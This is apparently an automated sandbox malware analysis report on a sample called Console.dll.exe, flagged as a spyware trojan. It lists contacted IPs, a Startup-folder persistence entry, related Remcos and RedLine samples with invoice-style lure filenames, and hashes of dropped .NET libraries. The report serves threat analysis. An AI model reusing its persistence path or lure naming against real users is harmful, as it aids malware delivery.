                                                                                                                                                              http://anglebug.com/3586chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://anglebug.com/5007chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://anglebug.com/3862chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
IP:178.23.190.70
Domain:unknown
Country:unknown
ASN:196724
ASN Name:LYNERO-ASDK
Malicious:false

IP:127.0.0.1
                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1576691
                                                                                                                                                                                                      Start date and time:2024-12-17 12:02:17 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 10m 16s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:Console.dll.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal76.troj.adwa.spyw.evad.winEXE@14/195@0/2
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 4.175.87.197
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • VT rate limit hit for: Console.dll.exe
Time:13:11:01
Type:Autostart
Description:Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
Match:LYNERO-ASDK
Associated Sample Name / URL; Detection; Threat Name; Context
Request for Quotation With Lead Time_docx.exe; malicious; Remcos; 178.23.190.118
Purchase Order MIPO2408-0348.exe; malicious; RedLine; 178.23.190.118
Shipping documents PO 16103 INV.exe; malicious; Remcos; 178.23.190.118
CFS-0682-2-08 Order.exe; malicious; Remcos; 178.23.190.118
DHL Shipment Document Waybill .exe; malicious; Remcos; 178.23.190.118
DHL Shipment Document Waybill NO # 1363232194.exe; malicious; Remcos; 178.23.190.118
SC-91048-docs.exe; malicious; Remcos, GuLoader; 178.23.190.118
Requirement Against PO. No. 242313609.pdf.exe; malicious; GuLoader, RedLine; 178.23.190.118
SecuriteInfo.com.Trojan.NSIS.Injector.28272.29476.exe; malicious; GuLoader, RedLine; 178.23.190.118
Price Offer_1200R4 1200R20.exe; malicious; GuLoader, RedLine; 178.23.190.118
Match:C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dll
Associated Sample Name / URL; Detection; Threat Name
JetBrains.dotPeek.2024.1.3.web.exe; malicious; Unknown
JetBrains.dotPeek.2024.1.3.web.exe; malicious; Unknown
Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe; malicious; Unknown
Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe; malicious; Unknown
Income and Welfare - UNIQLO 2023.exe; malicious; Unknown
ist_2023.exe; malicious; Unknown
latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe; malicious; Unknown
ist_2023.exe; malicious; Unknown
latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe; malicious; Unknown
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3318504
                                                                                                                                                                                                                        Entropy (8bit):6.537564216608803
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:C50b59Aj1ZLCpTT2TzAOeJ+KaGxHIkMNqo5wW0DlI6eujzc3:y0b3AjaFZE5WIR3
                                                                                                                                                                                                                        MD5:9FE1A31FDC7B67F5480E936D359EF6C3
                                                                                                                                                                                                                        SHA1:576269A42C0991E90F5E83C8205EB808D7B4D3BA
                                                                                                                                                                                                                        SHA-256:F42B8609854D80D7F81F276340504AA5E82BBE4D73D05080FEF1FCCA2444B4D5
                                                                                                                                                                                                                        SHA-512:7B7CAE9FC0AFCCEE7533971F97AF11E5DEDB54775BBFE45AD94B82BFDA6122E65FB378BD27B2390BFE45AF89438DBB550171F6939FEBCF742034A405B49339A7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: JetBrains.dotPeek.2024.1.3.web.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: JetBrains.dotPeek.2024.1.3.web.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Income and Welfare - UNIQLO 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ist_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ist_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):101590
                                                                                                                                                                                                                        Entropy (8bit):4.999114106065548
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:sZSXFt1Y29szfg4KXEQCTe3ZHZuS9WgEfZEKX:AS1t1Ygszfg4KXEQCTe3ZHZuS9WgEhE2
                                                                                                                                                                                                                        MD5:4187BEBAD599F3A199686DB6E5F1539D
                                                                                                                                                                                                                        SHA1:A5026C1E86A9B0A9CF9A9D171397E4850C226496
                                                                                                                                                                                                                        SHA-256:354FED19D9DA1EDB3AEB351BFEFA407DA3AE66194A7DA97F10EF66A9ADC19C0C
                                                                                                                                                                                                                        SHA-512:13F6D10DF46C5EA24794E5CAFDB9DDEF45DE1C15A33AF36AE820E0DF1415E08F41BD5CECEA037A439CDCF1BD11FDF8BFEB450EC29AA2A020851585F50321A9F2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v8.0/win-x86",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v8.0": {},.. ".NETCoreApp,Version=v8.0/win-x86": {.. "Console/1.0.0": {.. "dependencies": {.. "Microsoft.Data.Sqlite.Core": "8.0.10",.. "Microsoft.NET.ILLink.Tasks": "8.0.4",.. "Newtonsoft.Json": "13.0.3",.. "Portable.BouncyCastle": "1.9.0",.. "System.Data.SQLite": "1.0.119",.. "System.Security.Cryptography.ProtectedData": "8.0.0",.. "WebSocket4Net": "0.15.2",.. "WebSocketSharp-netstandard": "1.0.1",.. "runtimepack.Microsoft.NETCore.App.Runtime.win-x86": "8.0.4".. },.. "runtime": {.. "Console.dll": {}.. }.. },.. "runtimepack.Microsoft.NETCore.App.Runtime.win-x86/8.0.4": {.. "runtime": {.. "Microsoft.CSharp.dll": {.. "assemblyVersion": "8.0.0.0",..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):161792
                                                                                                                                                                                                                        Entropy (8bit):5.713549677483554
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:9ZHRz7kvA8Sinb2q097ncB2UWIYFi9AlDamv55NMSf9rXX2:DtkvA8v3097cMAYFi9uNMerXG
                                                                                                                                                                                                                        MD5:E59541DB8E65B83897783D355AC017E8
                                                                                                                                                                                                                        SHA1:A0D4FBEE9075D14C58DDB41583EBE284939C18AE
                                                                                                                                                                                                                        SHA-256:6DB09F73052CA6629B5B8FD68EC0B32BD92A6F6BD1A98AE9172273B8777D1520
                                                                                                                                                                                                                        SHA-512:FB92C935FB57128B546DDBE06DB87040762E8D90FC2590D47456A10FDD3610D417E974B69FE026C973ED8508360AED14D63D7526646B32498E83B464DEC305A3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):371
                                                                                                                                                                                                                        Entropy (8bit):4.6677211750904615
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:3Hp/hdNyhA0H0b2mwM5BXmJe5S1mvFAQ6NOCUo+K8E7/OyPfKmn5BNTy:dFG0b2voBEe01mlex+K8E7nS2r2
                                                                                                                                                                                                                        MD5:661E35647175F82187DD5C8BB306944A
                                                                                                                                                                                                                        SHA1:F89EED9A621CED974209DFDB10FEE7B642AF2EF1
                                                                                                                                                                                                                        SHA-256:0E2635A3899FB60828C22C14208AAD990CE44ACE0436B6A2644F02D3DA48D545
                                                                                                                                                                                                                        SHA-512:D6909B6D3D28CD6E103E9A22D611D4C6B4DF1E8ADECBEB6B1E10139BA0D738E8087739D3EEE08D370D7EFFFFACBFB72BE6FC7FD62F1130EF58573F5348AFAB1E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net8.0",.. "includedFrameworks": [.. {.. "name": "Microsoft.NETCore.App",.. "version": "8.0.4".. }.. ],.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false,.. "System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization": false.. }.. }..}
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):591440
                                                                                                                                                                                                                        Entropy (8bit):6.06924298598343
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CTiRnMqz14Oc9CxCTROMKahag9QQB6FHK13z6kuyPQG2puGeqVmjaVmnS4bfu65V:RnMqz14OcksHuAu65V
                                                                                                                                                                                                                        MD5:949A71C816089308551D32BC4BFFEA26
                                                                                                                                                                                                                        SHA1:D53C2BA8ED7571BF5F60759D67CC7CAE1ECBCA00
                                                                                                                                                                                                                        SHA-256:BE2BCDC9C0FF4A2865C8E5296F6A3C87C22411FF268E5EFF30FDCF5F8B2561E2
                                                                                                                                                                                                                        SHA-512:9FAD72A10898AE253CC8EC5F708B0856B649528B9CDD0F6851930264BA7246E41C0E13DDC72A1A4550823E3030E15C9D320412DF80B3A968D1056DB0065AD6C3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4977744
                                                                                                                                                                                                                        Entropy (8bit):6.096478054710026
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:+VEvjTmOH5S1w66gqvcWLxPkKOeI2y3BzwNZEnq:WEvjPGw8qPLxPnI6P
                                                                                                                                                                                                                        MD5:6999777A429B6A0EFD83AC3115F531CD
                                                                                                                                                                                                                        SHA1:158644373AA9A2C33032C5C07E430A120D7D3754
                                                                                                                                                                                                                        SHA-256:EADBAC604EFE1EA0272D1285F48E358541978AA1D198EF0420B0E522C793B8B4
                                                                                                                                                                                                                        SHA-512:EE21E3203C063950867B8710407130CA40D9FE5F1C07A2D0754D0673EAC0486B80A4286B3D385E35F78FDAEF089DDAF3391085E3DC4117410D654957D2020591
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):940208
                                                                                                                                                                                                                        Entropy (8bit):6.808830985340417
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:CzroE32gyU5iW+9whtbSIqHVu9yHlsC/67XBv:ooEmgRF++tbmHVu9yHSXBv
                                                                                                                                                                                                                        MD5:6128502A536B28C2694E33ED8CD3187B
                                                                                                                                                                                                                        SHA1:0CD5F84AD3FCAC9CBEDA4047E6E8649D895A3CFD
                                                                                                                                                                                                                        SHA-256:A44E59EAB4A6E466E3AA24FBC8C945C18E77ED98CEC928D383C54538069AC665
                                                                                                                                                                                                                        SHA-512:95C2F922094E3D32B2B3CB4E9E58097C164C70233E07752735331ACB2F9E45EAB515909E7328D99AFEBD27C30BF28A36636008FB87CC6684CFDC11954E7402AE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):173112
                                                                                                                                                                                                                        Entropy (8bit):6.170500775498013
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:BQ62vrFWupMQDF2XExA+Ch9kIDAX22uyZOteOf6GBSilr7DmILr1wEgIxJC/l7V:N2vjQExZM9hADulgA6dEfJCf
                                                                                                                                                                                                                        MD5:A8599D29A7FAE60E6C3B8B0C6287121A
                                                                                                                                                                                                                        SHA1:920A08CAD22B357A0BD57E4AF4F2FAE00A1901A8
                                                                                                                                                                                                                        SHA-256:FB967FAE5437A1A1932D4076760D4DFE893518C9A03E2059C5470AF26755C775
                                                                                                                                                                                                                        SHA-512:0F757D5302A128FEE9EE08D09947E4699D88B54631429A4F5501D8424FF1DEF1C5ACDBB977B72768C52F585116C1828450C11977B53E32BE7B347F6158B15BC5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1177760
                                                                                                                                                                                                                        Entropy (8bit):6.848480046631327
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:HLxNvX/3i1TKACt5LKGpxReFLO6Rf3iqQYR72pBeBKr:H3vXoTKACt1KGpC3iVOAe8r
                                                                                                                                                                                                                        MD5:33050B443062122F010194B73BD8AF00
                                                                                                                                                                                                                        SHA1:956DB0F1059258101379C6F2E2FD037F1AEADDE0
                                                                                                                                                                                                                        SHA-256:D9391AEE008001F86BAB5D7DA33FEFF97344F24026E3FBBAF1BF3403E9E96F50
                                                                                                                                                                                                                        SHA-512:4FBCE6314F70EBE621D84C589CEA1E4F1974B79DB36C5324A45FAF5748712D5C4C422544241F6D6310156B9BFFE54301D453C4D8E8FDD2738E84E5D3F782FFA5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17584
                                                                                                                                                                                                                        Entropy (8bit):6.595363896972929
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dku3cAuFxWmHw9QdWib5kHRN7ZuctHNsAR9zdJaBMs:WuMAucxbts89zHS
                                                                                                                                                                                                                        MD5:BA644F992F56E965FFDF1557CFCC7F6D
                                                                                                                                                                                                                        SHA1:CF95259A72666BFE2A6C5657116DF20D1024EE41
                                                                                                                                                                                                                        SHA-256:BEC43734B851521336FB1B105368E6EEDA22ACC2124A39530D1433B26E259BAF
                                                                                                                                                                                                                        SHA-512:AFD20791B634B89DD747DCC19A17D00DB28DE55C498F541409554A0455AE00C4DE08ED0538BAF98DD3FD5324BD5CB9EBA67753C30D2BAF7750E65DCFF761C6A9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.816097016728845
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:ri2GeWhQpWiI5kHRN7JldBmo8R9zCBUnfu6:rei3JhmoQ9zzfu6
                                                                                                                                                                                                                        MD5:95E00F4E8FC22C3447F7D26491A6A454
                                                                                                                                                                                                                        SHA1:ED6203DB937764A8557993D118B079DB275DE3D1
                                                                                                                                                                                                                        SHA-256:AF8033EC095475DF5EBB0F96F67032B5D07D8A2AC63422EE60472737D54FF7E0
                                                                                                                                                                                                                        SHA-512:FE00B6A06F18AB4AA68B4B6E87F22B1D070A4EE5F5457B39CE86083E9EC0FF45D01B95A247EC9EADCC2000C1C6D010E3F06AC88AFA079046D71A2D2309267CFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):104624
                                                                                                                                                                                                                        Entropy (8bit):6.239107531503012
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:txJ4wrxiBj+FQeqJSvEVcULVisIiqELYJD8Tf/pY:xriB+FrqJSvEVzoVCYopY
                                                                                                                                                                                                                        MD5:58A02530C07FF07AE2807187734B9079
                                                                                                                                                                                                                        SHA1:4DEA1F3CE455D5D2765B44D9DDE02410CD279706
                                                                                                                                                                                                                        SHA-256:E474A0D30B5186E42E4DBB08D0AD25AC523D322345A4470CAE7FB9252A7F0D4E
                                                                                                                                                                                                                        SHA-512:6CA211DC5D68BA3BA3C6543E3AEB877C876A28F432572F49462813D99645C78A65972C81F37434AB827E4AFFFE384460B8D6BB7F3DB46DA7793C973F10E73516
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50248
                                                                                                                                                                                                                        Entropy (8bit):6.289462537946871
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:zSXwygO6T53MF09ipSJkKFZGf9PTIG57raN8q8j76P5:zS596T53MoipSlZsVTIMvaN8Hj76P5
                                                                                                                                                                                                                        MD5:EF50BD977976ED929FABEAF6C9241C45
                                                                                                                                                                                                                        SHA1:AD004278F0C66CF0086C1024CE46B04852DE6ECA
                                                                                                                                                                                                                        SHA-256:1D5BBFB227F20E866CF25F649A059B61C3F35336F69EBD19B8EDE7B6E14A7414
                                                                                                                                                                                                                        SHA-512:5ED13DEBF26F120C80C09DF572571B3BB05FCABEE7B1C7D945D2D767B13A2FE1C5861CAD4FA1FEA1658357FB025F9237F7AE2DE510DB120CFF6EF4041D5F6707
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):712464
                                                                                                                                                                                                                        Entropy (8bit):5.960816598800232
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:mFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMW:6zMTMNNd+g5Wk78GBBjgrIQtDF
                                                                                                                                                                                                                        MD5:ADF3E3EECDE20B7C9661E9C47106A14A
                                                                                                                                                                                                                        SHA1:F3130F7FD4B414B5AEC04EB87ED800EB84DD2154
                                                                                                                                                                                                                        SHA-256:22C649F75FCE5BE7C7CCDA8880473B634EF69ECF33F5D1AB8AD892CAF47D5A07
                                                                                                                                                                                                                        SHA-512:6A644BFD4544950ED2D39190393B716C8314F551488380EC8BD35B5062AA143342DFD145E92E3B6B81E80285CAC108D201B6BBD160CB768DC002C49F4C603C0B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1592504
                                                                                                                                                                                                                        Entropy (8bit):6.822600212908256
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:m99D5xnu3JyrgBD+0AcwN12xVRz2JG4k7P4IYvbb8PBSB6LHLcZ4TB4v81R1k:mf5xnu3+g3wWPYkPk4HLDv1R1k
                                                                                                                                                                                                                        MD5:9CA5B1D02E334FFED34D80AE2B02490F
                                                                                                                                                                                                                        SHA1:84015D25373E1CA3A17E85FFFEF2BF1738BD172C
                                                                                                                                                                                                                        SHA-256:553693B15BDA4BBF7788BEE09B8BD325FFE4DB151686F432194C58E15B9B4F1E
                                                                                                                                                                                                                        SHA-512:B66BBA909C8EBBD3AAC071AD0599C952C27503D5414EBAF3CAE7D7A40ECA6CDC83B1DD438E4E9E72985FF96E4F3C1D54E9DBF1109AC0B74D2777A73C441507FB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50688
                                                                                                                                                                                                                        Entropy (8bit):5.811409220314285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:jmOGveifSTtyXEQ3nPGLb4PFvSMJCD2j+SIfHq1wJd9P581IADm/Dskqd:FLTtyXEQ3+bO6U+dlrPi14LsX
                                                                                                                                                                                                                        MD5:E4823410682299E5A17619043C789EFB
                                                                                                                                                                                                                        SHA1:410D31CA04AF5264F265DF10DE499416225A0962
                                                                                                                                                                                                                        SHA-256:C33995427EDD44FA641CF702DF8B63CC82CB7054DD984DC8277D15EE7C958874
                                                                                                                                                                                                                        SHA-512:5DDF9C356CB813BCA2097184CB16172A6B3D70CFB17CD11216CD1268550C2C897BC0C42A6675720E334EBF150EBB3725185380BB5822D9B4D953B00EC0B21583
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):49664
                                                                                                                                                                                                                        Entropy (8bit):5.624355880348956
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:tBoN0qD58Tbkn9DSZyBQAESH3S/aCGcjjJToUSrqvSKLAPs/yOrQV59L:tBvwFg/25sjVToDCAE/yOwP
                                                                                                                                                                                                                        MD5:D0B4C02720D3EAF223665C31F3A5980D
                                                                                                                                                                                                                        SHA1:E92DBCB6EA2DB9C745E0E566CFB001BBA026129C
                                                                                                                                                                                                                        SHA-256:B741FBEFC8576F305DF244918FA3D3BB167353B3FC44A2CB666EE5208AB95327
                                                                                                                                                                                                                        SHA-512:61CB24A6D86B491B7ACE554F3FCB33C20E308642540669EA04F271DE1B5B45BFE51F730D8D02013F71CFE3ED571581AD319DE9D470900ACAE7EBC833FFE09912
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
